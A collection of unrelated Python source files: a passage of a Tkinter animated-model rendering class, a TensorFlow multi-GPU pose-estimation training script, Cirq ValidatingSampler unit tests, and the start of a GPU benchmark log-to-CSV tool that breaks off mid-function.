            time.sleep((self.attributes.profiles[self.attributes.profile].animation.delay * self.attributes.profiles[self.attributes.profile].animation.frames) - ((time.time() - self.canvas_controller.global_time) % (self.attributes.profiles[self.attributes.profile].animation.delay * self.attributes.profiles[self.attributes.profile].animation.frames)))
        while self.attributes.anim_controller.run_loop:
            # Per-frame delay with a little random variation to de-sync models.
            time.sleep(self.attributes.profiles[self.attributes.profile].animation.delay + random.choice([0, self.attributes.profiles[self.attributes.profile].animation.variation, 0 - self.attributes.profiles[self.attributes.profile].animation.variation]))
            if self.attributes.anim_controller.playing_onetime and self.attributes.profiles[self.attributes.profile].animation.frames - 1 == self.attributes.anim_controller.frame: #resynchronise animations
                # One-shot animation finished: revert to the previous profile
                # at the frame it would have reached had it kept playing.
                old_anim_delay = self.attributes.profiles[self.attributes.profile].animation.delay
                old_anim_length = self.attributes.profiles[self.attributes.profile].animation.frames
                self.set(image_set = self.attributes.anim_controller.revert_to, frame = 0)
                new_elapsed = time.time() - self.attributes.anim_controller.onetime_start
                frames_elapsed = new_elapsed / self.attributes.profiles[self.attributes.profile].animation.delay
                self.set(frame = math.ceil(frames_elapsed) % self.attributes.profiles[self.attributes.profile].animation.frames)
                time.sleep((self.attributes.profiles[self.attributes.profile].animation.delay - (time.time() - self.attributes.anim_controller.onetime_start - (old_anim_delay * old_anim_length))) % self.attributes.profiles[self.attributes.profile].animation.delay)
                self.attributes.anim_controller.playing_onetime = False
                self.attributes.anim_controller.revert_to = None
            self.increment(frame = 1)
    def snap_coords(self, x, y):
        'Snap (x, y) to the centre of its grid cell; returns an int pair.'
        x /= self.attributes.snap.x
        y /= self.attributes.snap.y
        x = math.floor(x)
        y = math.floor(y)
        x += 0.5
        y += 0.5
        x *= self.attributes.snap.x
        y *= self.attributes.snap.y
        return int(x), int(y)
    def play_anim(self, name, ignore_precedence = False):
        """Plays an animation once through. If the animation is already playing, it will reset to the start"""
        # NOTE(review): 'or not ignore_precedence' means the precedence check is
        # bypassed whenever ignore_precedence is False — this reads inverted
        # relative to the parameter name; confirm intent before changing.
        if self.compare_profiles(self.attributes.profile, name) or not ignore_precedence:
            self.attributes.anim_controller.playing_onetime = True
            self.attributes.anim_controller.onetime_start = time.time()
            if not self.attributes.profile == name:
                # Remember what to go back to when the one-shot finishes.
                self.attributes.anim_controller.revert_to = self.attributes.profile
                self.attributes.anim_controller.revert_frame = self.attributes.anim_controller.frame
            self.set(image_set = name, frame = 0)
    def loop_anim(self, name):
        """Loop an animation. This will force the selected animation"""
        self.attributes.anim_controller.onetime_start = time.time()
        self.attributes.anim_controller.playing_onetime = False
        self.attributes.anim_controller.revert_to = self.attributes.profile
        self.set(image_set = name, frame = 0)
    def start_anims(self):
        'Start the frame-advancing thread (only if a profile enabled looping).'
        # run_loop is set True by MdlProfile.load when a profile has more than
        # one frame; models with single-frame profiles never spawn the thread.
        if self.attributes.anim_controller.run_loop:
            threading.Thread(target = self._anim_player, name = 'Model animation player', daemon = True).start()
    def compare_profiles(self, prof0, prof1):
        """Checks if profile 0 takes precedence over profile 1"""
        # NOTE(review): returns None (falsy) when neither profile is ranked —
        # callers treat that the same as False; confirm that is acceptable.
        if prof0 == prof1:
            return False
        elif prof0 in self.attributes.profile_ranks and prof1 in self.attributes.profile_ranks:
            # Lower index in the ranks list means higher precedence.
            return self.attributes.profile_ranks.index(prof0) < self.attributes.profile_ranks.index(prof1)
        elif prof0 in self.attributes.profile_ranks:
            return True
        elif prof1 in self.attributes.profile_ranks:
            return False
    # Alias: MdlProfile.setpos and Model.set share a calling convention in the
    # renderer, so expose set under the same name.
    setpos = set
class MdlProfile:
    """One named state ("profile") of a Model, e.g. an idle or walk animation.

    Loads the profile's textures, pre-renders every combination of
    frame x layer x rotation x transparency (quantised by the user's render
    quality), creates one parked-offscreen canvas object per combination, and
    exposes lookup/move/hide operations over those objects.
    """
    def __init__(self, model, data = None):
        self.model = model
        self._cfg = data  # raw profile dict from the model's list.json
        # Coordinates where this profile's objects are parked when hidden.
        class offscreen:
            x = 0
            y = 0
        self.offscreen = offscreen
        # Per-layer positional offset (scaled by layer index in get_offset).
        class offset:
            x = 0
            y = 0
        self.offset = offset
        # Quality-indexed settings: one value per render-quality level (0-3).
        self.rotations = [1, 1, 1, 1]
        self.transparencies = [1, 1, 1, 1]
        self.layers = [1, 1, 1, 1]
        self.num_existing_layers = 0
        self.use_grid = False
        self.uses_pil = False
        class animation:
            frames = 1
            delay = 0
            variation = 0
            sync = False
        self.animation = animation
        self.imgs = []              # loaded source images, per frame per layer
        self.transformed_imgs = []  # imgs after rotation/transparency passes
        self.canvobjs = []          # canvas object ids, same nesting as above
        if data is not None:
            self.load(data)
    def load(self, profile):
        'Parse the profile config, load textures and build canvas objects.'
        self._cfg = profile
        #unpack data
        self.offscreen.x = self._cfg['offscreen'][0]
        self.offscreen.y = self._cfg['offscreen'][1]
        if 'offset' in self._cfg:
            self.offset.x = self._cfg['offset'][0]
            self.offset.y = self._cfg['offset'][1]
        self.rotations = self._cfg['rotations']
        self.transparencies = self._cfg['transparencies']
        self.use_grid = self._cfg['use grid']
        self.layers = self._cfg['layers']
        self.uses_pil = self.model.attributes.uses_PIL
        self.animation.frames = self._cfg['animation']['frames']
        self.animation.delay = self._cfg['animation']['delay']
        self.animation.variation = self._cfg['animation']['variation']
        self.animation.sync = self._cfg['animation']['sync']
        # Fall back to the PIL-free texture set when PIL rendering is off.
        if not self.uses_pil and 'no PIL textures' in self._cfg:
            self._cfg['textures'] = self._cfg['no PIL textures']
        #load textures
        ##find the names of the textures
        img_names = []
        if type(self._cfg['textures']) == str:
            img_names = [[os.path.join(frame, name) for name in os.listdir(os.path.join(self.model.map_path, 'models', self.model.mdl_name, frame)) if os.path.isfile(os.path.join(self.model.map_path, 'models', self.model.mdl_name, frame, name))] for frame in os.listdir(os.path.join(self.model.map_path, 'models', self.model.mdl_name, self._cfg['textures']))] #unpack a two-level tree of animations then layers
        else:
            for frame in self._cfg['textures']:
                if type(frame) == str:
                    if frame.endswith('.gif'):
                        # One gif holds all frames of a single layer.
                        img_names.append(frame)
                    else:
                        # A directory: its files are the layers of this frame.
                        img_names.append([name for name in os.listdir(os.path.join(self.model.map_path, 'models', self.model.mdl_name, frame)) if os.path.isfile(os.path.join(self.model.map_path, 'models', self.model.mdl_name, frame, name))])
                else:
                    img_names.append(frame)
        ##load the textures into memory
        if type(img_names[0]) == str: #list of gifs - load with flipped dimensions
            # Keep only every k-th layer, where k depends on render quality.
            layer_indexes = [i for i in range(len(img_names)) if float(i / math.ceil(len(img_names) / self.layers[self.model.attributes.render_quality])).is_integer()]
            self.num_existing_layers = len(img_names)
            self.imgs = [[] for i in range(self.animation.frames)]
            for layer in img_names:
                if img_names.index(layer) in layer_indexes:
                    for i in range(self.animation.frames):
                        if self.uses_pil:
                            tex = self.model.pillow.gifimage(os.path.join(self.model.map_path, 'models', self.model.mdl_name, layer))
                            tex.seek(i)
                            self.imgs[i].append(tex)
                        else:
                            self.imgs[i].append(tk.PhotoImage(file = os.path.join(self.model.map_path, 'models', self.model.mdl_name, layer), format = 'gif -index {}'.format(i)))
        else:
            layer_indexes = [i for i in range(len(img_names[0])) if float(i / math.ceil(len(img_names[0]) / self.layers[self.model.attributes.render_quality])).is_integer()]
            self.num_existing_layers = len(img_names[0])
            for frame in img_names:
                current_slot = []
                for name in frame:
                    if frame.index(name) in layer_indexes:
                        if self.uses_pil:
                            current_slot.append(self.model.pillow.image.open(os.path.join(self.model.map_path, 'models', self.model.mdl_name, name)))
                        else:
                            current_slot.append(tk.PhotoImage(file = os.path.join(self.model.map_path, 'models', self.model.mdl_name, name)))
                self.imgs.append(current_slot)
        ##apply operations to textures
        if self.uses_pil:
            # Quantise the rotation/transparency space by render quality.
            rotation_values = [(value / (self.rotations[self.model.attributes.render_quality] / 360)) % 360 for value in range(1, self.rotations[self.model.attributes.render_quality] + 1, 1)]
            transparency_values = [value / (self.transparencies[self.model.attributes.render_quality] / 256) - 1 for value in range(1, self.transparencies[self.model.attributes.render_quality] + 1, 1)]
            # Make sure fully-transparent (0) is always representable.
            if self.transparencies[self.model.attributes.render_quality] > 1 and 0 not in transparency_values:
                transparency_values = [0] + [(value / ((self.transparencies[self.model.attributes.render_quality] - 1) / 360)) % 360 for value in range(1, self.transparencies[self.model.attributes.render_quality], 1)]
        else:
            # Without PIL only the identity transform is available.
            rotation_values = [0]
            transparency_values = [255]
        for frame in self.imgs:
            this_frame = []
            for layer in frame:
                this_layer = []
                for rotation in rotation_values:
                    this_rotation = []
                    for transparency in transparency_values:
                        this_rotation.append(self.apply_to(layer, rotation, transparency))
                    this_layer.append(this_rotation)
                this_frame.append(this_layer)
            self.transformed_imgs.append(this_frame)
        #make canvas objects
        for frame in self.transformed_imgs:
            new_layers = []
            for layer in frame:
                new_rotations = []
                for rotation in layer:
                    new_transparencies = []
                    for image_ in rotation:
                        # Every variant starts parked offscreen.
                        new_transparencies.append(self.model.canvas_controller.create_image(self.offscreen.x, self.offscreen.y, image = image_, layer = self.model.layer))
                    new_rotations.append(new_transparencies)
                new_layers.append(new_rotations)
            self.canvobjs.append(new_layers)
        # More than one frame means the model needs its animation thread.
        if len(self.canvobjs) > 1:
            self.model.attributes.anim_controller.run_loop = True
    def apply_to(self, image, rotation, transparency):
        'Return a PhotoImage of image with rotation/transparency applied (PIL only).'
        if self.uses_pil:
            if not rotation == 0:
                image = image.rotate((0 - rotation) % 360)
            if not transparency == 255:
                try:
                    # Multiply the alpha channel down by the transparency value.
                    image = self.model.pillow.image_chops.multiply(image, self.model.pillow.image.new('RGBA', image.size, color = (255, 255, 255, int(transparency))))
                except ValueError:
                    raise ValueError('Model texture doesn\'t have an alpha channel - make sure it uses 32 bit colour')
            return self.model.pillow.photoimage(image)
        else:
            return image
    def get_obj(self, frame, layer, rotation, transparency):
        'Look up the canvas object id for the quantised state combination.'
        if self.uses_pil:
            rot = int((self.squash_rotation(rotation) / 360) * self.rotations[self.model.attributes.render_quality])
            transp = int(self.squash_transparency(transparency) / (256 / self.transparencies[self.model.attributes.render_quality]))
            return self.canvobjs[frame][layer][rot][transp]
        else:
            return self.canvobjs[frame][layer][0][0]
    def get_offset(self, layer):
        'Return the (x, y) offset of a (possibly quality-skipped) layer index.'
        real_index = int(layer * (self.num_existing_layers / len(self.canvobjs[0])))
        return self.offset.x * real_index, self.offset.y * real_index
    def destroy(self):
        'Delete every canvas object this profile created.'
        for frame in self.canvobjs:
            for layer in frame:
                for rotation in layer:
                    for canvobj in rotation:
                        self.model.canvas_controller.delete(canvobj)
    def squash_rotation(self, rotation):
        'Quantise a rotation (degrees) to the nearest renderable step.'
        return self.clamp_to(rotation % 360, 360 / self.rotations[self.model.attributes.render_quality])
    def squash_transparency(self, transparency):
        'Quantise a transparency (0-255) to the nearest renderable step.'
        return self.clamp_to(transparency, 256 / self.transparencies[self.model.attributes.render_quality])
    def clamp_to(self, value, division, func_clamp = int):
        'Round value down (by default) to a multiple of division.'
        return func_clamp(value / division) * division
    def setpos(self, x, y, frame, rotation, transparency):
        'Move the canvas objects matching the state to (x, y), layer by layer.'
        for layer in range(len(self.canvobjs[frame])):
            if x == self.offscreen.x and y == self.offscreen.y:
                # Parking offscreen: never apply grid snapping or offsets.
                self.model.canvas_controller.coords(self.get_obj(frame, layer, rotation, transparency), x, y)
            else:
                if self.use_grid:
                    self.model.canvas_controller.coords(self.get_obj(frame, layer, rotation, transparency), *self.model.snap_coords(x + self.get_offset(layer)[0], y + self.get_offset(layer)[1]))
                else:
                    self.model.canvas_controller.coords(self.get_obj(frame, layer, rotation, transparency), x + self.get_offset(layer)[0], y + self.get_offset(layer)[1])
    def set_offscreen(self, frame, rotation, transparency):
        'Park the canvas objects matching the state at the offscreen position.'
        self.setpos(self.offscreen.x, self.offscreen.y, frame, rotation, transparency)
import tensorflow as tf
import os
import sys
from nets.CPM import CPM
from nets.Hourglass import Hourglass
from data.DomeReader import DomeReader
from data.HumanReader import HumanReader
from data.MultiDataset import combineMultiDataset
from data.COCOReader import COCOReader
import pickle
import utils.general
import utils.PAF
from utils.multigpu import average_gradients
from tensorflow.python.client import device_lib
# TensorFlow 1.x multi-GPU training script for a CPM-style 2D keypoint +
# PAF (part affinity field) body model, mixing Dome, Human3.6M and COCO data.
# One model "tower" is built per visible GPU; gradients are averaged on CPU.
num_gpu = sum([_.device_type == 'GPU' for _ in device_lib.list_local_devices()])

# Resume from an existing snapshot rather than training from scratch.
fine_tune = True
already_trained = 100000
train_para = {'lr': [1e-4, 1e-5],
              'lr_iter': [100000],
              'max_iter': 200000,
              'show_loss_freq': 10,
              'snapshot_freq': 5000,
              'snapshot_dir': 'snapshots/PAF_body_headtop_domehumanCOCO_chest_noPAF',
              'finetune_dir': 'snapshots/PAF_body_headtop_domehumanCOCO_chest_noPAF',
              'loss_weight_PAF': 1.0,
              }

PATH_TO_SNAPSHOTS = './{}/model-{}'.format(train_para['finetune_dir'], already_trained)  # only used when USE_RETRAINED is true
numStage = 5
# When True, 2D-typed PAF samples are masked out of the loss entirely.
ignore_PAF_2D = True

with tf.Graph().as_default(), tf.device('/cpu:0'):
    # Combined batch of 4 (1 dome + 2 human3.6m + 1 coco) split across GPUs.
    domereader = DomeReader(mode='training', batch_size=1, shuffle=True, objtype=0, crop_noise=True, full_only=False, head_top=True)
    # domereader.rotate_augmentation = True
    human36reader = HumanReader(mode='training', batch_size=2, shuffle=True, objtype=0, crop_noise=True)
    # mpi3dreader = HumanReader(mode='training', name='MPI_INF_3DHP', batch_size=2, shuffle=True, objtype=0, crop_noise=True)
    cocoreader = COCOReader(mode='training', batch_size=1, shuffle=True, objtype=0, crop_noise=True)
    # cocoreader.rotate_augmentation = True
    # upreader = HumanReader(mode='training', name='UP', batch_size=1, shuffle=True, objtype=0, crop_noise=True)
    # surrealreader = HumanReader(mode='training', name='SURREAL', batch_size=3, shuffle=True, objtype=0, crop_noise=True)
    # domereader.crop_size = 512
    # human36reader.crop_size = 512
    # cocoreader.crop_size = 512
    data = combineMultiDataset([
        domereader.get(),
        human36reader.get(),
        cocoreader.get(),
        # mpi3dreader.get()
        # upreader.get(),
        # surrealreader.get()
    ],
        name_wanted=['image_crop', 'scoremap2d', 'body_valid', 'PAF', 'PAF_type', 'mask_crop'])
    # Shard every tensor along the batch dimension, one slice per GPU tower.
    for k, v in data.items():
        data[k] = tf.split(v, num_gpu, 0)

    if fine_tune:
        global_step = tf.Variable(already_trained + 1, trainable=False, name="global_step")
    else:
        global_step = tf.Variable(0, trainable=False, name="global_step")
    lr_scheduler = utils.general.LearningRateScheduler(values=train_para['lr'], steps=train_para['lr_iter'])
    lr = lr_scheduler.get_lr(global_step)
    opt = tf.train.AdamOptimizer(lr)

    # Per-tower losses and gradients, gathered for CPU-side averaging.
    tower_grads = []
    tower_losses = []
    tower_losses_PAF = []
    tower_losses_2d = []

    with tf.variable_scope(tf.get_variable_scope()):
        for ig in range(num_gpu):
            with tf.device('/gpu:%d' % ig):
                # build network
                net = CPM(out_chan=21, crop_size=368, withPAF=True, PAFdim=3, numPAF=23, numStage=numStage)
                predicted_scoremaps, _, predicted_PAFs = net.inference(data['image_crop'][ig], train=True)
                # with tf.variable_scope('hourglass'):
                #     net = Hourglass(num_output_channel=20, PAF_dim=3, num_PAF=20, num_hourglass=numStage)
                #     predicted_scoremaps, predicted_PAFs = net.inference(data['image_crop'][ig])

                # Loss
                s = data['scoremap2d'][ig].get_shape().as_list()
                # Extra always-invalid channel pads body_valid to out_chan width.
                valid = tf.concat([data['body_valid'][ig], tf.zeros((s[0], 1), dtype=tf.bool)], axis=1)
                valid = tf.cast(valid, tf.float32)
                mask_scoremap = tf.tile(tf.expand_dims(data['mask_crop'][ig], axis=3), [1, 1, 1, s[3]])
                loss_2d = 0.0
                # multiply mask_scoremap to mask out the invalid areas
                # Average the per-stage 2D scoremap losses (intermediate supervision).
                for ip, predicted_scoremap in enumerate(predicted_scoremaps):
                    resized_scoremap = tf.image.resize_images(predicted_scoremap, (s[1], s[2]), method=tf.image.ResizeMethod.BICUBIC)
                    mean_over_pixel = tf.reduce_sum(tf.square((resized_scoremap - data['scoremap2d'][ig]) * mask_scoremap), [1, 2]) / (tf.reduce_sum(mask_scoremap, [1, 2]) + 1e-6)
                    loss_2d_ig = tf.reduce_sum(valid * mean_over_pixel) / (tf.reduce_sum(valid) + 1e-6)
                    loss_2d += loss_2d_ig
                loss_2d /= len(predicted_scoremaps)

                assert 'PAF' in data
                loss_PAF = 0.0
                valid_PAF = tf.cast(utils.PAF.getValidPAF(data['body_valid'][ig], 0, PAFdim=3), tf.float32)
                # multiply mask_PAF to mask out the invalid areas
                s = data['PAF'][ig].get_shape().as_list()
                mask_PAF = tf.tile(tf.expand_dims(data['mask_crop'][ig], axis=3), [1, 1, 1, s[3]])
                mask_PAF = tf.reshape(mask_PAF, [s[0], s[1], s[2], -1, 3])  # detach x, y, z
                if ignore_PAF_2D:
                    # Zero out all three components for 2D-typed samples.
                    mask_PAF2D = mask_PAF * tf.constant([0, 0, 0], dtype=tf.float32)
                else:
                    mask_PAF2D = mask_PAF * tf.constant([1, 1, 0], dtype=tf.float32)  # for the 2D case
                mask_PAF = tf.where(data['PAF_type'][ig], mask_PAF, mask_PAF2D)  # take out corresponding mask by PAF type
                mask_PAF = tf.reshape(mask_PAF, [s[0], s[1], s[2], -1])
                # Average the per-stage PAF losses.  For 2D-typed ground truth
                # the prediction is compared after normalising its (x, y) to
                # unit length and zeroing z, so only direction is penalised.
                for ip, pred_PAF in enumerate(predicted_PAFs):
                    resized_PAF = tf.image.resize_images(pred_PAF, (s[1], s[2]), method=tf.image.ResizeMethod.BICUBIC)
                    channelWisePAF = tf.reshape(resized_PAF, [s[0], s[1], s[2], -1, 3])
                    PAF_x2y2 = tf.sqrt(tf.reduce_sum(tf.square(channelWisePAF[:, :, :, :, 0:2]), axis=4)) + 1e-6
                    PAF_normed_x = channelWisePAF[:, :, :, :, 0] / PAF_x2y2
                    PAF_normed_y = channelWisePAF[:, :, :, :, 1] / PAF_x2y2
                    PAF_normed_z = tf.zeros(PAF_normed_x.get_shape(), dtype=tf.float32)
                    normed_PAF = tf.stack([PAF_normed_x, PAF_normed_y, PAF_normed_z], axis=4)
                    normed_PAF = tf.reshape(normed_PAF, [s[0], s[1], s[2], -1])
                    normed_PAF = tf.where(tf.logical_and(tf.not_equal(data['PAF'][ig], 0.0), tf.not_equal(resized_PAF, 0.0)),
                                          normed_PAF, tf.zeros((s[0], s[1], s[2], s[3]), dtype=tf.float32))  # use normed_PAF only in pixels where PAF is not zero
                    final_PAF = tf.where(data['PAF_type'][ig], resized_PAF, normed_PAF)
                    # mean_over_pixel = tf.reduce_sum(tf.square((resized_PAF - data['PAF'][ig]) * mask_PAF), [1, 2]) / (tf.reduce_sum(mask_PAF, [1, 2]) + 1e-6)
                    mean_over_pixel = tf.reduce_sum(tf.square((final_PAF - data['PAF'][ig]) * mask_PAF), [1, 2]) / (tf.reduce_sum(mask_PAF, [1, 2]) + 1e-6)
                    loss_PAF_ig = tf.reduce_sum(valid_PAF * mean_over_pixel) / (tf.reduce_sum(valid_PAF) + 1e-6)
                    loss_PAF += loss_PAF_ig
                loss_PAF /= len(predicted_PAFs)
                loss = loss_2d + loss_PAF * train_para['loss_weight_PAF']
                # Share variables between towers from the second tower on.
                tf.get_variable_scope().reuse_variables()
                tower_losses.append(loss)
                tower_losses_PAF.append(loss_PAF)
                tower_losses_2d.append(loss_2d)
                grad = opt.compute_gradients(loss)
                tower_grads.append(grad)

    total_loss = tf.reduce_mean(tower_losses)
    total_loss_PAF = tf.reduce_mean(tower_losses_PAF)
    total_loss_2d = tf.reduce_mean(tower_losses_2d)
    grads = average_gradients(tower_grads)
    apply_gradient_op = opt.apply_gradients(grads, global_step=global_step)

    gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.6)
    sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, allow_soft_placement=True))
    sess.run(tf.global_variables_initializer())
    tf.train.start_queue_runners(sess=sess)

    tf.summary.scalar('loss', total_loss)
    tf.summary.scalar('loss_PAF', total_loss_PAF)
    tf.summary.scalar('loss_2d', total_loss_2d)

    # init weights
    # NOTE(review): global_variables_initializer is run a second time here
    # (also above, before start_queue_runners) — presumably harmless but
    # redundant; confirm before removing either call.
    sess.run(tf.global_variables_initializer())
    saver = tf.train.Saver(max_to_keep=None)
    merged = tf.summary.merge_all()
    train_writer = tf.summary.FileWriter(train_para['snapshot_dir'] + '/train', sess.graph)

    if not fine_tune:
        start_iter = 0
        if net.name == 'CPM':
            # Bootstrap from converted OpenPose weights.
            net.init('./weights/openpose_body_3DPAF_randomz_headtop_chest.npy', sess)
            # net.init('./weights/openpose_body_expanded_PAF.npy', sess)
        elif net.name == 'Hourglass':
            from tensorflow.contrib.framework import assign_from_values_fn
            with open('weights/Hourglass_weights_processed.pkl', 'rb') as f:
                hg_data = pickle.load(f)
            # Map checkpoint names ('hourglass/...') onto this graph's
            # variable names ('my_model/...').
            map_trainable_variables = {i.name.replace('hourglass', 'my_model').replace(':0', ''): i.name for i in tf.trainable_variables()}
            dic = dict()
            for i, j in map_trainable_variables.items():
                if i in hg_data:
                    dic[j] = hg_data[i]
            init_fn = assign_from_values_fn(dic)
            assert init_fn is not None
            init_fn(sess)
        else:
            raise NotImplementedError
        # net.init_vgg(sess)
    else:
        from utils.load_ckpt import load_weights_from_snapshot
        load_weights_from_snapshot(sess, PATH_TO_SNAPSHOTS)
        # saver.restore(sess, PATH_TO_SNAPSHOTS)
        start_iter = already_trained + 1

    # snapshot dir
    if not os.path.exists(train_para['snapshot_dir']):
        os.mkdir(train_para['snapshot_dir'])
        print('Created snapshot dir:', train_para['snapshot_dir'])

    # Training loop
    print('Starting to train ...')
    for i in range(start_iter, train_para['max_iter']):
        # V = sess.run([resized_PAF, mask_PAF, PAF_x2y2, PAF_normed_x, PAF_normed_y, PAF_normed_z, normed_PAF, final_PAF, mean_over_pixel, loss_PAF_ig])
        # import pdb
        # pdb.set_trace()
        summary, _, loss_v, loss_2d_v, loss_PAF_v = sess.run([merged, apply_gradient_op, total_loss, total_loss_2d, total_loss_PAF])
        train_writer.add_summary(summary, i)
        if (i % train_para['show_loss_freq']) == 0:
            print('Iteration %d\t Loss %.1e, Loss_2d %.1e, Loss_PAF %.1e' % (i, loss_v, loss_2d_v, loss_PAF_v))
            sys.stdout.flush()
        if (i % train_para['snapshot_freq']) == 0 and i > start_iter:
            saver.save(sess, "%s/model" % train_para['snapshot_dir'], global_step=i)
            print('Saved a snapshot.')
            sys.stdout.flush()

    print('Training finished. Saving final snapshot.')
    saver.save(sess, "%s/model" % train_para['snapshot_dir'], global_step=train_para['max_iter'])
|
# Copyright 2021 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import List
import pytest
import sympy
import numpy as np
import cirq
import cirq_google as cg
def test_device_validation():
    """A ValidatingSampler with a device rejects circuits on invalid qubits."""
    sampler = cg.ValidatingSampler(
        device=cg.Sycamore23, validator=lambda c, s, r: True, sampler=cirq.Simulator()
    )

    # A qubit that exists on the Sycamore23 device.
    good_qubit = cirq.GridQubit(5, 2)
    circuit = cirq.Circuit(
        cirq.X(good_qubit) ** sympy.Symbol('t'), cirq.measure(good_qubit, key='m')
    )
    sweep = cirq.Points(key='t', points=[1, 0])
    results = sampler.run_sweep(circuit, sweep, repetitions=100)
    assert np.all(results[0].measurements['m'] == 1)
    assert np.all(results[1].measurements['m'] == 0)

    # A qubit that is not on the device must be rejected by validation.
    bad_qubit = cirq.GridQubit(2, 2)
    circuit = cirq.Circuit(
        cirq.X(bad_qubit) ** sympy.Symbol('t'), cirq.measure(bad_qubit, key='m')
    )
    with pytest.raises(ValueError, match='Qubit not on device'):
        sampler.run_sweep(circuit, sweep, repetitions=100)
def _batch_size_less_than_two(
    circuits: List[cirq.Circuit], sweeps: List[cirq.Sweepable], repetitions: int
):
    """Validator that rejects batches with more than two circuits."""
    batch_size = len(circuits)
    if batch_size > 2:
        raise ValueError('Too many batches')
def test_batch_validation():
    """The batch validator bounds how many circuits may be run together."""
    sampler = cg.ValidatingSampler(
        device=cirq.UNCONSTRAINED_DEVICE,
        validator=_batch_size_less_than_two,
        sampler=cirq.Simulator(),
    )
    qubit = cirq.GridQubit(2, 2)

    # Two circuits: accepted by the validator.
    circuits = [
        cirq.Circuit(cirq.X(qubit) ** sympy.Symbol('t'), cirq.measure(qubit, key='m')),
        cirq.Circuit(cirq.X(qubit) ** sympy.Symbol('x'), cirq.measure(qubit, key='m2')),
    ]
    sweeps = [cirq.Points(key='t', points=[1, 0]), cirq.Points(key='x', points=[0, 1])]
    results = sampler.run_batch(circuits, sweeps, repetitions=100)
    assert np.all(results[0][0].measurements['m'] == 1)
    assert np.all(results[0][1].measurements['m'] == 0)
    assert np.all(results[1][0].measurements['m2'] == 0)
    assert np.all(results[1][1].measurements['m2'] == 1)

    # A third circuit pushes the batch over the limit.
    circuits.append(cirq.Circuit(cirq.measure(qubit, key='m3')))
    sweeps.append({})
    with pytest.raises(ValueError, match='Too many batches'):
        sampler.run_batch(circuits, sweeps, repetitions=100)
def _too_many_reps(circuits: List[cirq.Circuit], sweeps: List[cirq.Sweepable], repetitions: int):
    """Validator that rejects runs requesting more than 10000 repetitions."""
    max_allowed = 10000
    if repetitions > max_allowed:
        raise ValueError('Too many repetitions')
def test_sweeps_validation():
    """The validator also sees the repetition count and may reject it."""
    sampler = cg.ValidatingSampler(
        device=cirq.UNCONSTRAINED_DEVICE,
        validator=_too_many_reps,
        sampler=cirq.Simulator(),
    )
    qubit = cirq.GridQubit(2, 2)
    circuit = cirq.Circuit(
        cirq.X(qubit) ** sympy.Symbol('t'), cirq.measure(qubit, key='m')
    )
    sweeps = [cirq.Points(key='t', points=[1, 0]), cirq.Points(key='x', points=[0, 1])]
    with pytest.raises(ValueError, match='Too many repetitions'):
        _ = sampler.run_sweep(circuit, sweeps, repetitions=20000)
def test_batch_default_sweeps():
    """run_batch accepts sweeps=None, defaulting to no parameterization."""
    sampler = cg.ValidatingSampler()
    qubit = cirq.GridQubit(2, 2)
    flip_circuit = cirq.Circuit(cirq.X(qubit), cirq.measure(qubit, key='m'))
    idle_circuit = cirq.Circuit(cirq.measure(qubit, key='m2'))
    results = sampler.run_batch([flip_circuit, idle_circuit], None, repetitions=100)
    assert np.all(results[0][0].measurements['m'] == 1)
    assert np.all(results[1][0].measurements['m2'] == 0)
|
<filename>tools/log2csv.py
import os
import re
import glob
import argparse
import pandas as pd
# Models benchmarked in every experiment; these become the CSV columns.
list_test = ["alexnet", "inception3", "inception4", "resnet152", "resnet50", "vgg16"]

# Naming convention
# Key: log name
# Value: ([num_gpus], [names])
# num_gpus: Since each log folder has all the record for different numbers of GPUs,
#   it is convenient to specify the benchmarks you want to pull by listing the num_gpus
# names: rename the experiments so they are easier to understand
list_system = {
    "7742-A100-SXM4-40GB": (
        [1, 2, 4, 8],
        [
            "NorthernData A100 40GB SXM4",
            "NorthernData 2x A100 40GB SXM4",
            "NorthernData 4x A100 40GB SXM4",
            "NorthernData 8x A100 40GB SXM4",
        ],
    ),
    "7402P-Radeon_Instinct_MI50_16GB": (
        [1, 2, 4, 8],
        [
            "NorthernData — Mi 50",
            "NorthernData — 2x Mi 50",
            "NorthernData — 4x Mi 50",
            "NorthernData — 8x Mi 50",
        ],
    ),
}
def get_result(path_logs, folder, model):
    """Parse the batch size and throughput for one benchmark run.

    Locates the first directory matching ``<path_logs>/<folder>/<model>*``
    (the directory name is expected to end with ``-<batch_size>``), then reads
    its ``throughput/1`` file; the last whitespace-separated token of the
    second-to-last line is the measured throughput.

    Args:
        path_logs: root directory containing the log folders.
        folder: experiment folder name inside ``path_logs``.
        model: model-name prefix used to locate the run directory.

    Returns:
        (batch_size, throughput): the batch size as a string and the
        throughput as a rounded int (0 when the value cannot be parsed).
    """
    folder_path = glob.glob(path_logs + "/" + folder + "/" + model + "*")[0]
    folder_name = folder_path.split("/")[-1]
    batch_size = folder_name.split("-")[-1]
    file_throughput = folder_path + "/throughput/1"
    with open(file_throughput, "r") as f:
        lines = f.read().splitlines()
    line = lines[-2]
    throughput = line.split(" ")[-1]
    try:
        throughput = int(round(float(throughput)))
    except ValueError:
        # Fixed: was a bare `except:`. A non-numeric throughput (e.g. a
        # failed run) is recorded as 0; other errors now propagate.
        throughput = 0
    return batch_size, throughput
def create_row_throughput(
    path_logs, mode, data, precision, key, num_gpu, name, df, is_train=True
):
    """Fill the DataFrame row `name` with per-model throughput values.

    Args:
        path_logs: root directory that contains the log folders.
        mode: parameter-update method ("replicated" or "parameter_server").
        data: data source tag ("syn" or "real").
        precision: "fp32" selects the fp32 logs; anything else selects fp16
            (preserving the original two-way branch).
        key: system key from `list_system`; log folders are "<key>.logs/...".
        num_gpu: number of GPUs used in the run.
        name: row index label in `df`.
        df: pandas DataFrame, updated in place.
        is_train: read training logs when True, inference logs otherwise.
    """
    # Folder layout: <key>.logs/<data>-<mode>-<precision>-<N>gpus[-inference]
    # (collapses the original four copy-pasted branches into one builder).
    precision_tag = "fp32" if precision == "fp32" else "fp16"
    folder = (
        key + ".logs/" + data + "-" + mode + "-" + precision_tag + "-"
        + str(num_gpu) + "gpus"
    )
    if not is_train:
        folder += "-inference"
    for model in list_test:
        _, throughput = get_result(path_logs, folder, model)
